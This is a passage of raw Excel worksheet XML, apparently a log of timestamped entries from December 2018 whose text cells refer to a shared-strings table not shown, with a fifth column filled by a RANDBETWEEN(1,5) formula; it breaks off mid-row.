    <row r="6084" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6084" s="1">
        <v>43444.17560185185</v>
      </c>
      <c r="C6084" t="s">
        <v>319</v>
      </c>
      <c r="D6084" t="s">
        <v>320</v>
      </c>
      <c r="E6084" s="2" t="s">
        <v>5500</v>
      </c>
      <c r="F6084">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6085" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6085" s="1">
        <v>43444.136377314811</v>
      </c>
      <c r="C6085" t="s">
        <v>454</v>
      </c>
      <c r="E6085" s="2" t="s">
        <v>5501</v>
      </c>
      <c r="F6085">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6086" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6086" s="1">
        <v>43444.127442129633</v>
      </c>
      <c r="C6086" t="s">
        <v>124</v>
      </c>
      <c r="E6086" t="s">
        <v>5502</v>
      </c>
      <c r="F6086">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6087" s="1">
        <v>43444.125752314816</v>
      </c>
      <c r="C6087" t="s">
        <v>92</v>
      </c>
      <c r="E6087" t="s">
        <v>5068</v>
      </c>
      <c r="F6087">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6088" s="1">
        <v>43444.116041666668</v>
      </c>
      <c r="C6088" t="s">
        <v>41</v>
      </c>
      <c r="E6088" t="s">
        <v>5503</v>
      </c>
      <c r="F6088">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6089" s="1">
        <v>43444.11451388889</v>
      </c>
      <c r="C6089" t="s">
        <v>2082</v>
      </c>
      <c r="F6089">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6090" s="1">
        <v>43444.114398148151</v>
      </c>
      <c r="C6090" t="s">
        <v>2082</v>
      </c>
      <c r="F6090">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6091" s="1">
        <v>43444.109618055554</v>
      </c>
      <c r="C6091" t="s">
        <v>1130</v>
      </c>
      <c r="E6091" t="s">
        <v>5068</v>
      </c>
      <c r="F6091">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6092" s="1">
        <v>43444.108819444446</v>
      </c>
      <c r="C6092" t="s">
        <v>6</v>
      </c>
      <c r="D6092" t="s">
        <v>821</v>
      </c>
      <c r="F6092">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6093" s="1">
        <v>43444.104270833333</v>
      </c>
      <c r="C6093" t="s">
        <v>226</v>
      </c>
      <c r="E6093" t="s">
        <v>5068</v>
      </c>
      <c r="F6093">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6094" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6094" s="1">
        <v>43444.100671296299</v>
      </c>
      <c r="C6094" t="s">
        <v>10</v>
      </c>
      <c r="D6094" t="s">
        <v>6</v>
      </c>
      <c r="E6094" t="s">
        <v>5504</v>
      </c>
      <c r="F6094">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6095" s="1">
        <v>43444.09878472222</v>
      </c>
      <c r="C6095" t="s">
        <v>226</v>
      </c>
      <c r="E6095" t="s">
        <v>5068</v>
      </c>
      <c r="F6095">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6096" s="1">
        <v>43444.098298611112</v>
      </c>
      <c r="C6096" t="s">
        <v>2082</v>
      </c>
      <c r="F6096">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6097" s="1">
        <v>43444.097581018519</v>
      </c>
      <c r="C6097" t="s">
        <v>10</v>
      </c>
      <c r="D6097" t="s">
        <v>36</v>
      </c>
      <c r="E6097" t="s">
        <v>5505</v>
      </c>
      <c r="F6097">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6098" s="1">
        <v>43444.067557870374</v>
      </c>
      <c r="C6098" t="s">
        <v>6</v>
      </c>
      <c r="D6098" t="s">
        <v>194</v>
      </c>
      <c r="F6098">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6099" s="1">
        <v>43444.066759259258</v>
      </c>
      <c r="C6099" t="s">
        <v>1130</v>
      </c>
      <c r="E6099" t="s">
        <v>5506</v>
      </c>
      <c r="F6099">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6100" s="1">
        <v>43444.066180555557</v>
      </c>
      <c r="C6100" t="s">
        <v>10</v>
      </c>
      <c r="D6100" t="s">
        <v>6</v>
      </c>
      <c r="E6100" t="s">
        <v>5243</v>
      </c>
      <c r="F6100">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6101" s="1">
        <v>43444.065625000003</v>
      </c>
      <c r="C6101" t="s">
        <v>60</v>
      </c>
      <c r="F6101">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6102" s="1">
        <v>43444.063518518517</v>
      </c>
      <c r="C6102" t="s">
        <v>124</v>
      </c>
      <c r="E6102" t="s">
        <v>5507</v>
      </c>
      <c r="F6102">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6103" s="1">
        <v>43444.060833333337</v>
      </c>
      <c r="C6103" t="s">
        <v>10</v>
      </c>
      <c r="D6103" t="s">
        <v>6</v>
      </c>
      <c r="E6103" t="s">
        <v>5243</v>
      </c>
      <c r="F6103">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6104" s="1">
        <v>43444.054282407407</v>
      </c>
      <c r="C6104" t="s">
        <v>10</v>
      </c>
      <c r="D6104" t="s">
        <v>6</v>
      </c>
      <c r="E6104" t="s">
        <v>5508</v>
      </c>
      <c r="F6104">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6105" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6105" s="1">
        <v>43444.006550925929</v>
      </c>
      <c r="C6105" t="s">
        <v>189</v>
      </c>
      <c r="E6105" s="2" t="s">
        <v>5509</v>
      </c>
      <c r="F6105">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6106" s="1">
        <v>43443.954039351855</v>
      </c>
      <c r="C6106" t="s">
        <v>10</v>
      </c>
      <c r="D6106" t="s">
        <v>36</v>
      </c>
      <c r="E6106" t="s">
        <v>776</v>
      </c>
      <c r="F6106">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6107" s="1">
        <v>43443.951157407406</v>
      </c>
      <c r="C6107" t="s">
        <v>226</v>
      </c>
      <c r="E6107" t="s">
        <v>5510</v>
      </c>
      <c r="F6107">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6108" s="1">
        <v>43443.951099537036</v>
      </c>
      <c r="C6108" t="s">
        <v>226</v>
      </c>
      <c r="E6108" t="s">
        <v>5510</v>
      </c>
      <c r="F6108">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6109" s="1">
        <v>43443.948796296296</v>
      </c>
      <c r="C6109" t="s">
        <v>2155</v>
      </c>
      <c r="D6109" t="s">
        <v>11</v>
      </c>
      <c r="E6109" t="s">
        <v>4359</v>
      </c>
      <c r="F6109">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6110" s="1">
        <v>43443.948414351849</v>
      </c>
      <c r="C6110" t="s">
        <v>2082</v>
      </c>
      <c r="F6110">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6111" s="1">
        <v>43443.948333333334</v>
      </c>
      <c r="C6111" t="s">
        <v>2082</v>
      </c>
      <c r="F6111">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6112" s="1">
        <v>43443.948298611111</v>
      </c>
      <c r="C6112" t="s">
        <v>2082</v>
      </c>
      <c r="F6112">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6113" s="1">
        <v>43443.9372337963</v>
      </c>
      <c r="C6113" t="s">
        <v>10</v>
      </c>
      <c r="D6113" t="s">
        <v>36</v>
      </c>
      <c r="E6113" t="s">
        <v>776</v>
      </c>
      <c r="F6113">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6114" s="1">
        <v>43443.937175925923</v>
      </c>
      <c r="C6114" t="s">
        <v>10</v>
      </c>
      <c r="D6114" t="s">
        <v>36</v>
      </c>
      <c r="E6114" t="s">
        <v>776</v>
      </c>
      <c r="F6114">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6115" s="1">
        <v>43443.933148148149</v>
      </c>
      <c r="C6115" t="s">
        <v>226</v>
      </c>
      <c r="E6115" t="s">
        <v>5068</v>
      </c>
      <c r="F6115">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6116" s="1">
        <v>43443.930312500001</v>
      </c>
      <c r="C6116" t="s">
        <v>10</v>
      </c>
      <c r="D6116" t="s">
        <v>36</v>
      </c>
      <c r="E6116" t="s">
        <v>5511</v>
      </c>
      <c r="F6116">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6117" s="1">
        <v>43443.9297337963</v>
      </c>
      <c r="C6117" t="s">
        <v>226</v>
      </c>
      <c r="E6117" t="s">
        <v>5068</v>
      </c>
      <c r="F6117">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6118" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6118" s="1">
        <v>43443.92082175926</v>
      </c>
      <c r="C6118" t="s">
        <v>10</v>
      </c>
      <c r="D6118" t="s">
        <v>229</v>
      </c>
      <c r="E6118" s="2" t="s">
        <v>5512</v>
      </c>
      <c r="F6118">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6119" s="1">
        <v>43443.919409722221</v>
      </c>
      <c r="C6119" t="s">
        <v>1130</v>
      </c>
      <c r="E6119" t="s">
        <v>5068</v>
      </c>
      <c r="F6119">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6120" s="1">
        <v>43443.918611111112</v>
      </c>
      <c r="C6120" t="s">
        <v>73</v>
      </c>
      <c r="E6120" t="s">
        <v>5513</v>
      </c>
      <c r="F6120">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6121" s="1">
        <v>43443.867962962962</v>
      </c>
      <c r="C6121" t="s">
        <v>10</v>
      </c>
      <c r="D6121" t="s">
        <v>36</v>
      </c>
      <c r="E6121" t="s">
        <v>5514</v>
      </c>
      <c r="F6121">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6122" s="1">
        <v>43443.86310185185</v>
      </c>
      <c r="C6122" t="s">
        <v>10</v>
      </c>
      <c r="D6122" t="s">
        <v>36</v>
      </c>
      <c r="E6122" t="s">
        <v>5515</v>
      </c>
      <c r="F6122">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6123" s="1">
        <v>43443.849247685182</v>
      </c>
      <c r="C6123" t="s">
        <v>2082</v>
      </c>
      <c r="F6123">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6124" s="1">
        <v>43443.840405092589</v>
      </c>
      <c r="C6124" t="s">
        <v>226</v>
      </c>
      <c r="E6124" t="s">
        <v>5068</v>
      </c>
      <c r="F6124">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6125" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6125" s="1">
        <v>43443.779618055552</v>
      </c>
      <c r="C6125" t="s">
        <v>189</v>
      </c>
      <c r="E6125" s="2" t="s">
        <v>5516</v>
      </c>
      <c r="F6125">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6126" s="1">
        <v>43443.759166666663</v>
      </c>
      <c r="C6126" t="s">
        <v>48</v>
      </c>
      <c r="E6126" t="s">
        <v>5517</v>
      </c>
      <c r="F6126">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6127" s="1">
        <v>43443.726666666669</v>
      </c>
      <c r="C6127" t="s">
        <v>229</v>
      </c>
      <c r="D6127" t="s">
        <v>33</v>
      </c>
      <c r="E6127" t="s">
        <v>3995</v>
      </c>
      <c r="F6127">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6128" s="1">
        <v>43443.651365740741</v>
      </c>
      <c r="C6128" t="s">
        <v>124</v>
      </c>
      <c r="E6128" t="s">
        <v>5518</v>
      </c>
      <c r="F6128">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6129" s="1">
        <v>43443.604814814818</v>
      </c>
      <c r="C6129" t="s">
        <v>41</v>
      </c>
      <c r="E6129" t="s">
        <v>5519</v>
      </c>
      <c r="F6129">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6130" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6130" s="1">
        <v>43443.575231481482</v>
      </c>
      <c r="C6130" t="s">
        <v>41</v>
      </c>
      <c r="E6130" s="2" t="s">
        <v>5520</v>
      </c>
      <c r="F6130">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6131" s="1">
        <v>43443.562511574077</v>
      </c>
      <c r="C6131" t="s">
        <v>41</v>
      </c>
      <c r="E6131" t="s">
        <v>5521</v>
      </c>
      <c r="F6131">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6132" s="1">
        <v>43443.559953703705</v>
      </c>
      <c r="C6132" t="s">
        <v>318</v>
      </c>
      <c r="F6132">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6133" s="1">
        <v>43443.556967592594</v>
      </c>
      <c r="C6133" t="s">
        <v>318</v>
      </c>
      <c r="E6133" t="s">
        <v>5522</v>
      </c>
      <c r="F6133">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6134" s="1">
        <v>43443.532430555555</v>
      </c>
      <c r="C6134" t="s">
        <v>318</v>
      </c>
      <c r="E6134" t="s">
        <v>5523</v>
      </c>
      <c r="F6134">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6135" s="1">
        <v>43443.418055555558</v>
      </c>
      <c r="C6135" t="s">
        <v>140</v>
      </c>
      <c r="D6135" t="s">
        <v>141</v>
      </c>
      <c r="F6135">
        <f t="shared" ca="1" si="95"/>
        <v>1</v>
      </c>
    </row>
    <row r="6136" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A6136" s="1">
        <v>43443.416342592594</v>
      </c>
      <c r="C6136" t="s">
        <v>318</v>
      </c>
      <c r="E6136" s="2" t="s">
        <v>5524</v>
      </c>
      <c r="F6136">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6137" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6137" s="1">
        <v>43443.325300925928</v>
      </c>
      <c r="C6137" t="s">
        <v>41</v>
      </c>
      <c r="E6137" s="2" t="s">
        <v>5525</v>
      </c>
      <c r="F6137">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6138" s="1">
        <v>43443.271851851852</v>
      </c>
      <c r="C6138" t="s">
        <v>41</v>
      </c>
      <c r="E6138" t="s">
        <v>5526</v>
      </c>
      <c r="F6138">
        <f t="shared" ca="1" si="95"/>
        <v>3</v>
      </c>
    </row>
    <row r="6139" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6139" s="1">
        <v>43443.196238425924</v>
      </c>
      <c r="C6139" t="s">
        <v>2082</v>
      </c>
      <c r="F6139">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6140" s="1">
        <v>43443.195613425924</v>
      </c>
      <c r="C6140" t="s">
        <v>107</v>
      </c>
      <c r="D6140" t="s">
        <v>290</v>
      </c>
      <c r="E6140" t="s">
        <v>3973</v>
      </c>
      <c r="F6140">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6141" s="1">
        <v>43443.118692129632</v>
      </c>
      <c r="C6141" t="s">
        <v>226</v>
      </c>
      <c r="E6141" t="s">
        <v>5068</v>
      </c>
      <c r="F6141">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6142" s="1">
        <v>43443.113645833335</v>
      </c>
      <c r="C6142" t="s">
        <v>2745</v>
      </c>
      <c r="E6142" t="s">
        <v>5068</v>
      </c>
      <c r="F6142">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6143" s="1">
        <v>43443.112812500003</v>
      </c>
      <c r="C6143" t="s">
        <v>2082</v>
      </c>
      <c r="F6143">
        <f t="shared" ca="1" si="95"/>
        <v>4</v>
      </c>
    </row>
    <row r="6144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6144" s="1">
        <v>43443.108368055553</v>
      </c>
      <c r="C6144" t="s">
        <v>2745</v>
      </c>
      <c r="E6144" t="s">
        <v>5068</v>
      </c>
      <c r="F6144">
        <f t="shared" ca="1" si="95"/>
        <v>5</v>
      </c>
    </row>
    <row r="6145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6145" s="1">
        <v>43443.097025462965</v>
      </c>
      <c r="C6145" t="s">
        <v>2082</v>
      </c>
      <c r="E6145" t="s">
        <v>5527</v>
      </c>
      <c r="F6145">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
    <row r="6146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6146" s="1">
        <v>43443.096898148149</v>
      </c>
      <c r="C6146" t="s">
        <v>2082</v>
      </c>
      <c r="E6146" t="s">
        <v>5527</v>
      </c>
      <c r="F6146">
        <f t="shared" ref="F6146:F6209" ca="1" si="96">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="6147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6147" s="1">
        <v>43443.096493055556</v>
      </c>
      <c r="C6147" t="s">
        <v>226</v>
      </c>
      <c r="E6147" t="s">
        <v>5068</v>
      </c>
      <c r="F6147">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6148" s="1">
        <v>43443.089074074072</v>
      </c>
      <c r="C6148" t="s">
        <v>10</v>
      </c>
      <c r="D6148" t="s">
        <v>6</v>
      </c>
      <c r="E6148" t="s">
        <v>776</v>
      </c>
      <c r="F6148">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6149" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6149" s="1">
        <v>43443.067083333335</v>
      </c>
      <c r="C6149" t="s">
        <v>724</v>
      </c>
      <c r="E6149" s="2" t="s">
        <v>5528</v>
      </c>
      <c r="F6149">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6150" s="1">
        <v>43443.051053240742</v>
      </c>
      <c r="C6150" t="s">
        <v>226</v>
      </c>
      <c r="E6150" t="s">
        <v>5068</v>
      </c>
      <c r="F6150">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6151" s="1">
        <v>43443.050937499997</v>
      </c>
      <c r="C6151" t="s">
        <v>226</v>
      </c>
      <c r="E6151" t="s">
        <v>5068</v>
      </c>
      <c r="F6151">
        <f t="shared" ca="1" si="96"/>
        <v>4</v>
      </c>
    </row>
    <row r="6152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6152" s="1">
        <v>43443.048796296294</v>
      </c>
      <c r="C6152" t="s">
        <v>2082</v>
      </c>
      <c r="F6152">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6153" s="1">
        <v>43443.026226851849</v>
      </c>
      <c r="C6153" t="s">
        <v>2082</v>
      </c>
      <c r="F6153">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6154" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6154" s="1">
        <v>43443.007245370369</v>
      </c>
      <c r="C6154" t="s">
        <v>226</v>
      </c>
      <c r="E6154" t="s">
        <v>5068</v>
      </c>
      <c r="F6154">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6155" s="1">
        <v>43443.007175925923</v>
      </c>
      <c r="C6155" t="s">
        <v>226</v>
      </c>
      <c r="E6155" t="s">
        <v>5068</v>
      </c>
      <c r="F6155">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6156" s="1">
        <v>43442.953993055555</v>
      </c>
      <c r="C6156" t="s">
        <v>10</v>
      </c>
      <c r="D6156" t="s">
        <v>36</v>
      </c>
      <c r="E6156" t="s">
        <v>5529</v>
      </c>
      <c r="F6156">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6157" s="1">
        <v>43442.953935185185</v>
      </c>
      <c r="C6157" t="s">
        <v>10</v>
      </c>
      <c r="D6157" t="s">
        <v>36</v>
      </c>
      <c r="E6157" t="s">
        <v>5529</v>
      </c>
      <c r="F6157">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6158" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A6158" s="1">
        <v>43442.944618055553</v>
      </c>
      <c r="C6158" t="s">
        <v>10</v>
      </c>
      <c r="D6158" t="s">
        <v>36</v>
      </c>
      <c r="E6158" s="2" t="s">
        <v>5530</v>
      </c>
      <c r="F6158">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6159" s="1">
        <v>43442.94295138889</v>
      </c>
      <c r="C6159" t="s">
        <v>2745</v>
      </c>
      <c r="E6159" t="s">
        <v>5068</v>
      </c>
      <c r="F6159">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6160" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6160" s="1">
        <v>43442.942893518521</v>
      </c>
      <c r="C6160" t="s">
        <v>2745</v>
      </c>
      <c r="E6160" t="s">
        <v>5068</v>
      </c>
      <c r="F6160">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6161" s="1">
        <v>43442.908402777779</v>
      </c>
      <c r="C6161" t="s">
        <v>2745</v>
      </c>
      <c r="E6161" t="s">
        <v>5068</v>
      </c>
      <c r="F6161">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6162" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6162" s="1">
        <v>43442.901747685188</v>
      </c>
      <c r="C6162" t="s">
        <v>226</v>
      </c>
      <c r="E6162" t="s">
        <v>5068</v>
      </c>
      <c r="F6162">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6163" s="1">
        <v>43442.885370370372</v>
      </c>
      <c r="C6163" t="s">
        <v>2745</v>
      </c>
      <c r="E6163" t="s">
        <v>5068</v>
      </c>
      <c r="F6163">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6164" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6164" s="1">
        <v>43442.866643518515</v>
      </c>
      <c r="C6164" t="s">
        <v>2082</v>
      </c>
      <c r="E6164" t="s">
        <v>5531</v>
      </c>
      <c r="F6164">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6165" s="1">
        <v>43442.866574074076</v>
      </c>
      <c r="C6165" t="s">
        <v>2082</v>
      </c>
      <c r="E6165" t="s">
        <v>5531</v>
      </c>
      <c r="F6165">
        <f t="shared" ca="1" si="96"/>
        <v>1</v>
      </c>
    </row>
    <row r="6166" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6166" s="1">
        <v>43442.841678240744</v>
      </c>
      <c r="C6166" t="s">
        <v>10</v>
      </c>
      <c r="D6166" t="s">
        <v>36</v>
      </c>
      <c r="E6166" t="s">
        <v>5532</v>
      </c>
      <c r="F6166">
        <f t="shared" ca="1" si="96"/>
        <v>3</v>
      </c>
    </row>
    <row r="6167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6167" s="1">
        <v>43442.733425925922</v>
      </c>
      <c r="C6167" t="s">
        <v>10</v>
      </c>
      <c r="D6167" t="s">
        <v>89</v>
      </c>
      <c r="E6167" t="s">
        <v>5533</v>
      </c>
      <c r="F6167">
        <f t="shared" ca="1" si="96"/>
        <v>2</v>
      </c>
    </row>
    <row r="6168" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6168" s="1">
        <v>43442.57707175926</v>
      </c>
      <c r="C6168" t="s">
        <v>6</v>
      </c>
      <c r="D6168" t="s">
        <v>25</v>
      </c>
      <c r="E6168" s="2" t="s">
        <v>5534</v>
      </c>
      <c r="F6168">
        <f t="shared" ca="1" si="96"/>
        <v>5</v>
      </c>
    </row>
    <row r="6169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6169" s="1">
